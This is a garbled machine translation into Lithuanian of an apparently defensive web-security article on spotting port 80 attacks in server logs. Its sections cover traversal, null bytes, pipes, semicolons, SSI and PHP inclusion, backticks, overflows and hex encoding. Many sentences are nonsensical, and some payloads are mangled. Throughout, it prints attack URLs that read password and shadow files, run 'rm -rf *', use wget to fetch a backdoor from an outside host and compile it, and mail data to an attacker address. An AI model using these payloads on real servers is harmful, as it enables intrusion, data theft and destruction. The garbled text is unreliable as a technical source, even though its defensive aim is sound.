I. Santrauka
II. Išsamus
III. Toliau
IV. Pasklidimo analizė
V. perkodavimas
VI. Išvada
[Santrauka]
svetainė 80 kaip numatytąją paslaugos uoste, jo išleidimas saugumo problemų įvairovę laikyti kai kuriuos iš šių pažeidžiamumų leidžia įsilaužėliui gauti net sistemos administratoriaus leidimą įvažiuoti į svetainę pati, taip yra apie 80 uostų Zenomorph pėdsakų užpuolimo mokslinių tyrimų ir sužinosite, kaip rasti problemų iš žurnalo įrašus.
[Detail]
Čia iš dalies per daug Liezi rodyti interneto serverių ir taikomųjų programų plačiai išpuolių, ir jo pėdsakai, importuotos automatiškai Liezi tik sudaro pirmaujančių išpuolių Fang Shi nebuvo sąrašas visų išpuolių forma šioje dalyje bus Išsamus kiekvieno užpuolimo vaidmenį, ir jo, kaip panaudoti šias spragas pulti.
(1). "" ".." Ir "..." prašymą
Pėdos šių išpuolių yra labai dažni, interneto programų ir interneto serverių, kurie buvo naudojami, kad būtų galima perkrauti arba kirminas antivirusinės programos Gaibian serverio kelią, Huode apsilankymas Feigongkaide Qu J.. Dauguma CGI programas su tomis trūkumų, ".." prašymu.
Pavyzdys:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Tai rodo, užpuolikas Liezi prašymą mosd šį failą, jei užpuolikas gebėjimas proveržio serverio šakniniame kataloge, tada gauti daugiau informacijos ir gauti daugiau privilegijų.
(2) "% 20" prašymą
% 20 hex vertę, 16 vietų, tačiau tai nereiškia, galite naudoti nieko, bet kai tu peržiūrėti žurnalo ras jį, kai tinklo serverio programų paleista požymis gali būti veiksmingai įgyvendintos Todėl, turite atidžiai perskaityti šį straipsnį. Kita vertus, prašymą kartais gali padėti atlikti kai komandas.
Pavyzdys:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Šis Liezi rodo užpuolikas vykdyti unix komanda, sąrašą ir visame kataloge prašomais dokumentais, todėl užpuolikas gauti svarbius failus į jūsų sistemą, padėti jam toliau teikti gauti privilegijas sąlygos.
(3) "% 00" prašymą
% 00 sako 16-byte šešioliktainis tuščias, jis galėjo apgauti internetinę taikomąją programą, ir prašo įvairių tipų failus.
Pavyzdžiai:
http://host/cgi-bin/lame.cgi?page=index.html
Tai gali būti teisingai teisiškai įformintą prašymą į mašiną, jei užpuolikas apie šį prašymą buvo sėkmingas, jis ir toliau ieškoti Cgi procedūras.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Patikrinkite ar CGI programa nepriima šio prašymo, nes jis prašymą patikrinti failo išplėtimas, pavyzdžiui: html.shtml ar kitų tipų failus. Dauguma programų pasakys norimo failo tipas yra neteisingas, šį kartą jis jums pasakys užpuolikas prašo byla turi būti iš failo tipą priesaga ženklas, todėl puolėjas gali gauti sistemos kelią, failo pavadinimą, todėl Jūsų sistema tampa jautresnės informacija
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Dėmesio, šio prašymo, jis bus apgauti CGI programą, kad šis dokumentas yra nustatyti priimtinas failų tipų, kai veiksmingą kontrolę, kaip kvaila prašyti failo, kuris dažniausiai naudojamų būdų užpuolikas programas.
(4) "|" prašymą
Tai vamzdžių pobūdžio, unix sistemos, už pagalbą iš kelių sistemos komandos įgyvendinimo prašymą tuo pačiu metu.
Pavyzdys:
# Cat access_log | grep-i ".."
(Ši komanda parodys prisijungti ".." prašymą, paprastai naudojami išpuolių ir kirminai rasti)
Dažnai atranda, kad daug interneto programas naudoti šį požymį, tai taip pat veda prie klaidingų pavojaus signalų ir IDS rąstų.
Jei atidžiai išnagrinėti jūsų paraišką, taip siekiant sumažinti netikrų pavojaus signalų ir įsibrovimo aptikimo sistemos pranašumas.
Štai keletas Lieh-Tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Šis prašymas komanda, taip kai kurie iš Liezi pakeitimus
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Šis prašymas yra išvardytos unix sistemos kataloge / etc visus failus
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "nevykęs"
Cat komandos vykdymas prašymą ir grep komanda įgyvendinimas taip pat patikrinkite, ar iš "nevykęs"
(5) ";" prašymą
UNIX sistemose, šis požymis leidžia naudoti kelis komandinės eilutės vykdymo
Pavyzdys:
# Id; uname-
(Įgyvendinant ID komandą, po įgyvendinimo uname komanda)
Kai kurie interneto svetainių programos su tokio pobūdžio, gali atsirasti jūsų IDS Įrašai gedimo įspėjimo, turėtumėte atidžiai patikrinti savo interneto programą, todėl Jums sumažinti nesėkmės IDS perspėjimų rizika.
(6) " " ir " " Užsisakyti
Turėtų patikrinti savo žurnalus, registruoja kaip dviejų ženklų, dėl daugelio priežasčių, Pirmasis požymis, kad papildoma duomenų dokumentas
1 pavyzdys:
# Echo "jūsų hax0red H0 H0" / etc / motd (MOTD prašymą raštu pateikta informacija, šiame dokumente)
Užpuolikas gali lengvai naudoti, kaip nurodyta pirmiau klastotės jūsų tinklalapio straipsniuose. Tokie kaip garsaus RDS išnaudoti užpuolikas dažnai naudojama pakeisti tinklalapio.
2 pavyzdys:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html jūs pastebėsite, kad ženklų kalba čia, jis taip pat praleido " "," " simbolių, tokių išpuolių negali sukelti užpuolikas prisijungti prie sistemos, ji painiojama žmonės galvoja, tai teisėtas svetainės informaciją (todėl Žmonės aplankyti šią nuorodą, jei norite aplankyti užpuolikas nustatyti adresą, šį prašymą, gali būti užkoduojami 16 hex simbolių formą, kad pėdsakų užpuolimo yra ne toks akivaizdus)
(7) "!" Užsisakyti
Bendrą kalbą dėl šio pobūdžio prašymą SS (Server Side Įtraukti) aš ataka, jei užpuolikas yra užpuolikas supainioti, kai vartotojas paspaudžia nuorodą nustatyti, ir pačias kaip ir aukščiau.
Pavyzdys:
http://host1/something.php =
Lieh-Tzu yra užpuolikas gali padaryti, kad toje vietoje, host2 failą host1 rodomas virš (žinoma, reikia lankytojų aplankyti atakującego ry ¹ io parametrus. Šis prašymas gali būti pertvarkoma į 16 hex kodavimas kaukę, nėra lengva rasti)
Tuo pat metu, šis metodas taip pat gali vykdyti vadovavimo institucija svetainė
Pavyzdys:
http://host/something.php =
Lieh valdoma nuotolinio sistemos "id" komandą, jis bus rodomas tinklalapio vartotojo ID, paprastai "niekas" arba "www"
Ši forma taip pat leidžia įtraukti paslėptus failus.
Pavyzdys:
http://host/something.php =
Paslėptus failus. Htpasswd nebus rodomas, Apache atsisako nustatyti tokias taisykles. Ht prašymo formą, ir SSI logotipas bus apeiti tokius apribojimus, ir sukelti saugumo problemų
(8) "," Užsisakyti
Tokie išpuoliai naudojami bandant nuotolinio įterpti PHP taikymo tvarkos, gali leisti vykdyti sprendimą, priklausomai nuo serverio parametrų ir kitų veiksnių poveikiu darbe (pvz., PHP yra nustatytas saugus režimas)
Pavyzdys: http://host/something.php = passthru ("id ");?
Kai paprastas php taikymo, jis gali būti į svetainę nuotolinio sistemos naudotojo teises atlikti vietos komanda
(9) "" "prašymą
Šis simbolis vėliau naudojamas vykdyti komandas Perl, interneto priede simbolių nėra dažnai naudojamas, todėl, jei jūs matote jį į savo žurnalą, turėtų būti labai atsargūs
Pavyzdys:
http://host/something.cgi = `id`
Rašyti perl cgi programos klausimą lemtų įgyvendinimo ID komandos
[Daugiau]
Šiame skyriuje bus aptarti daugiau išpuolių įgyvendinimas galėtų komandą, kartu su prašomais dokumentais ir, jei turite nuotolinio valdymo vykdymo klaida, jis turėtų būti kaip patikrinti atradimas. Ši dalis yra tiesiog suteikti jums gera idėja, ir pasakyti savo sistemą, kas vyksta, puola bandyti atakuoti savo sistemą TRACES, tačiau ne visos iš užpuoliko naudoti komandas ir prašymus.
"/ Bin / ls"
Ši komanda prašo visą kelią, daugelyje interneto programų turi šią spragą, jei log daugelyje vietų tokį prašymą, būtų galima dideliems nuotolinio vykdymo komandų pažeidžiamumą, bet nebūtinai yra problema Taip pat gali būti netikro pavojaus signalo. Dar kartą primenama, interneto programa, parašyta (CGI, ASP, PHP ... ir tt) yra saugumo pagrindas
Pavyzdys:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Tai korpuso langai, jei užpuolikas susipažinti ir naudoti šią serverio nustatymus scenarijų sąlygomis leidžiama langai mašina gali daryti viską, kirminų partija per uostą 80, ryšių su nuotolinio kompiuterio
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Tai du dvejetainiai failai, jo problemas ir / bin / ls, pvz, jei žurnalą daugelyje vietų tokį prašymą, būtų galima dideliems nuotolinio vykdymo komandų pažeidžiamumą, bet nebūtinai yra problema Taip pat gali būti netikro pavojaus signalo.
Ji parodys, kokia dalis priklauso, koks vartotojas ir grupė
Pavyzdys:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Ši komanda galima ištrinti failus be tinkamo jų naudojimo yra labai pavojingas
Pavyzdžiai:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget ir TFTP" komandą
Šios komandos dažnai puola gali įgyti daugiau privilegijų atsisiųsti failus, wget yra UNIX komandinės pagal, gali būti naudojamas parsisiųsti Backdoors, TFTP yra pagal komandą Unix ir Windows NT, naudojamas atsisiųsti failą. Kai IIS kirminų plitimo patys tftp kopijuoti virusą kitiems šeimininkų
Pavyzdžiai:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// priimančiosios / cgi-bin / bad.cgi? DOH = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Katė" komandą
Ši komanda naudojama peržiūrėti failo turinį, naudojamas perskaityti informaciją, pavyzdžiui, konfigūracijos failus, slaptažodžiu failus, kredito bylų ir dokumentų galite sugalvoti
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = kačių% 20/etc/motd;
"Aidas" komandą
Ši komanda naudojama duomenims įrašyti į failą, pavyzdžiui, "index.html"
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "FC-# kivių% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "FC-# kivių% 20was% 20here"% 20 % 200day.txt;
"Ps" komandą
Sąrašai šiuo metu veikia procesas, pasakykite užpuolikas, kad nuotoliniu kompiuteriu, kuriame veikia programinės įrangos, siekiant gauti tam tikrą saugumo klausimai idėja, gauti daugiau leidimų
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH = PS% 20-aux;
"Žudyti ir killall" komandą
Unix, kad nužudyti šį procesą, užpuolikas gali naudoti šią komandą sustabdyti paslaugų sistemos ir procesai vienu metu gali ištrinti iš užpuoliko žymių, kai išnaudoti gamins vaikų procesus aikštelė
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" komandą
Ši komanda nurodo užpuolikas nuotolinio kompiuterio vardą, kurį laiką, per šią svetainę, kad būtų žinoma, kurie ISP, užpuolikas, kurie gali būti lankomi šiandien. Uname-prašyti paprastai jie bus įrašyti į failą
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? DOH = uname% 20-;
"Kopija, gcc, Perl, Python, ir tt ..." sukaupti aiškinimo komanda
Attacker per wget arba tftp parsisiųsti išnaudoti, ir naudoti cc, gcc kompiliatorių, kad užsakovas surinktų į vykdomąjį programa, ir toliau naudotis privilegijomis
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Jei naršydami Įrašai rasti "perl" python "Šie nurodymai gali būti nutolęs užpuolikas gali atsisiųsti Perl, Python scenarijų, ir stengėsi gauti privilegijas vietos
"Paštas" komandą
Puolėjai dažnai naudoti šią komandą, sistema, kai kuriuos svarbius dokumentus užpuolikas savo pašto dėžutę, bet taip pat nori e-mail bombų atakas atlieka
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, Chgrp, Chsh, itp ..." ir kitas komandas
Šios komandos leidžia sistemą pakeisti Unix failų sistemą,
chown = leidžia nustatyti failo savininkas chmod = leidžia nustatyti failo teises Chgrp = leidžia savininkas pakeisti grupės teises į failus Chsh = leista pakeisti vartotojo apvalkalas
Pavyzdžiai: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / Chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" failą
Tai sistemos slaptažodis failą, paprastai šešėlis išjungti, ir neleidžia matyti užšifruotos slaptažodį, bet užpuolikas, kurie gali žinoti, kas teisingą vartotojo ir sistemos absoliutų kelią, svetainės pavadinimą ir kitą informaciją, kaip paprastai pagal šešėlį ne, todėl užpuolikas paprastai / etc / shadow failą
"/ Etc / master.passwd"
Šis failas yra sistemoje BSD slaptažodį failas, kuriame yra užkoduota slaptažodį, ant šaknų į failą tik skaityti, tik, o kai nekvalifikuotų užpuolikai pradėjo savo bandymą skaityti turinį viduje., Jei interneto svetainė root teisėmis paleisti, tada užpuolikas yra, mes galime skaityti turinį viduje, problemų dėl sistemos administratorius aikštelė bus vienas po kito
"/ Etc / shadow"
Sudėtyje slaptažodį užšifruotos sistema, skaitomos tą pačią dėl šaknų sąskaitą, ir / ET / master.passwd beveik
"/ Etc / motd"
Kai vartotojai prisijungti prie UNIX sistema, kurią "Message of the Day" informacijos byla, jis yra svarbios sistemos ir administratorius kai nustatyta, vartotojams, kurie nori pamatyti tie, kurie nėra vartotojai, taip pat yra sistemos versijos informaciją, užpuolikas paprastai pamatyti šį failą, kad suprastų, ką sistema veikia užpuolikas, kitas žingsnis yra ieškoti tokios sistemos, išnaudoti ir toliau naudotis sistema privilegijų
"/ Etc / hosts"
Šiame dokumente pateikiama IP adresą ir tinklo informacijos, užpuolikas gali sužinoti daugiau apie sistemą "tinklo nustatymus
"/ Usr / local / apache / conf / httpd.conf"
Tai Apache web serverio konfigūracijos rinkmena, užpuolikas gali suprasti, kaip CGI, SSI ir kita informacija yra prieinama
"/ Etc / inetd.conf"
Tai konfigūracijos failą inetd paslaugos, užpuolikas gali mokytis nuotolinio kompiuterio, paleiskite šias paslaugas, ar naudoti pakuotę prieigos kontrolės, jeigu įvyniojimo medžiaga buvo nustatyta rodyti, užpuolikas kitas žingsnis bus patikrinti "/ etc / hosts.allow" ir "/ etc / hosts.deny" failą, ir kurie gali keisti kai kuriuos parametrus, naudotis privilegijomis
". Htpasswd. Htaccess ir. Htgroup"
Šie failai paprastai naudojamos svetainės vartotojų autentifikavimo, užpuolikas gali peržiūrėti šiuos failus, ir gauti vartotojo vardą ir slaptažodį, slaptažodį failą. Htpasswd saugiame iki, Hack per keletą paprastų dešifravimo procese, leisti įsilaužėliui gauti svetainės saugomų teritorijų (paprastai su tuo pačiu vartotojo vardu ir slaptažodžiu vartotojo užpuolikas gali net aplankyti kitus sąskaitą)
"Access_log ir error_"
Tai yra Apache serverio log failus, puola dažnai peržiūrėti šiuos failus, pažvelgti į šiuos prašymus, yra įrašomi šie ir kiti klausimai skirtingose vietose
Paprastai puola bus pakeisti šiuos failus, tokius kaip jo paties adreso informaciją, per 80 porto puolėjas per savo sistemą ir savo atsargine sistema, taip pat neveikia, nėra jokio kito įrašo programos registracijos sistemą statusą, kuris būtų įsilaužimo aptikimo tampa labai sunku darbą
"[Disko raides]: winntrepairsam._ arba [disko raides]: winntrepairsam"
Windows NT slaptažodį byla, jei nuotolinio valdymo negali būti įgyvendinta, užpuolikai paprastai prašymu šie dokumentai, tada spustelėkite "l0pht kreko" iš slaptažodis tipo krekingo įrankiai įtrūkimai, jei užpuolikas bandys pulti administratoriaus slaptažodis failo, jei sėkmingas tada nuotoliniame kompiuteryje bus užpuolikas pasireiškia kontrolės
[Perpildyta analizė]
Šiame straipsnyje aš pasakysiu, per daug apie šią temą perkrautas, duosiu tai, kas šiais reiškiniais ir pėdsakai pastebėti ir ypatingą susirūpinimą, buferio dažnai atakavo užpuolikas kodas konversijos ir sunku rasti kitų būdų siekiant
Čia yra paprastas melas Zi
Pavyzdys: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA A.
Šis Liezi rodo puolėjas dėl paraiškos siunčia pobūdžio aikštelė, išbandyti programą buferio, buferio galite gauti nuotolinio valdymo vykdymo priimančiojoje leidimus, jeigu savininkas setuid ir procedūrų šaknis, per perkrautas, gali susipažinti su visa sistema, jei nepatinka setuid programos, tada perteklius yra tik veikia interneto svetainės naudotojų teisių
Čia negali pasakyti visų aplinkybių, tačiau reikia nuolat tikrinti savo failą, jei tą dieną netikėtai rasti prašymų daug, tačiau paprastai ne didesnis kaip prašymą, ji reiškia, kad jūs drauge su perpildymo atakų, žinoma, taip pat gali būti naują tinklą širdys išpuolių
[Perkodavimas]
Visi išpuolių minėta prašymu užpuolikas paprastai žino IDS sistemoms dažnai yra mechaninis prašymą patikrinti duomenis, paprastai puola naudoti duomenis konvertavimo įrankis konvertuoti į kurią kreipiamasi, turinio formatas 16 juosta, todėl IDS ignoruos šiuos prašymus, Mes žinome CGI pažeidžiamumo skenavimo įrankis, kuris yra geras Liezi Whisker. Jei manote, kad po laiko Prisijungti rasti daug 16-juostoje, o ne kai kurių bendrų simbolių, tada užpuolikas gali bandyti naudoti keli būdai pulti savo sistemą
Greitas būdas yra jūsų failą tiems 16 hex prašymą, nukopijuokite jį į savo naršyklę, naršyklė gali būti konvertuojamos į teisę prašyti, ir rodomas, o prašymo turinys, jei ne drąsos prisiimti šią riziką, paprastas vyras ASCII, gali suteikti jums teisingą kodą.
[Išvados]
Straipsnis negali apimti visus 80 uostų ataka, tačiau jau yra buvę daugiau nei dauguma bendro puolimo, ir pasakyti, kaip patikrinti savo failus, ir, kaip pridėti, pavyzdžiui, IDS taisyklės numeris, tikslas yra parašyti savo Web sistema administratorius turėtų būti susirūpinęs, kas gera idėja vienu metu, tikiuosi, šiame straipsnyje padeda interneto programos interneto programų kūrėjams parašyti geriau programas
Pastabos: Jei turite pastabų ir pasiūlymų, prašome siųsti e-mail admin@cgisecurity.com.